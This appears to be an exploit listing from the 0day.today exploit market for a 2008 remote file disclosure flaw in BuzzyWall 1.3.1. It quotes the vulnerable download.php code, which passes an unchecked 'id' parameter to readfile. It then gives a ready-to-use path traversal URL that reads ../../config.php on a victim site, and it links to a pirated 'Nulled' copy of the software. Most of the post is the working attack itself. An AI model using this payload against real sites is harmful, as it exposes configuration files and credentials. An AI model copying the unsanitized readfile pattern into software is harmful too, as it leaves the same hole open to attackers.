[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BuzzyWall 1.3.1 (download id) Remote File Disclosure Vulnerability

Author
b3hz4d
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3950
Category
web applications
Date add
23-10-2008
Platform
unsorted
==================================================================
BuzzyWall 1.3.1 (download id) Remote File Disclosure Vulnerability
==================================================================


        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                    +
        +        BuzzyWall Remote File Disclosure Vulnerability              +
        +                                                                    +
        +                     Discovered by b3hz4d                           +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


		
AUTHOR : b3hz4d
DATE   : 25 oct 2008

#####################################################

APPLICATION : BuzzyWall
DOWNLOAD    : http://rapidshare.com/files/155522383/BuzzyWall.v1.3.1.Nulled.zip
VENDOR      : http://www.buzzywall.com

#####################################################


[+] vuln    : ./download.php

               
$file_name = $_GET['id']

               $file_path = $weburl."wallpapers/full/".$file_name;

                     .

                     .

                     .

                     .

               readfile("$file_path");

   

[+] Exploit : http://victim.com/download.php?id=../../config.php



##############################################################################



#  0day.today [2024-12-28]  #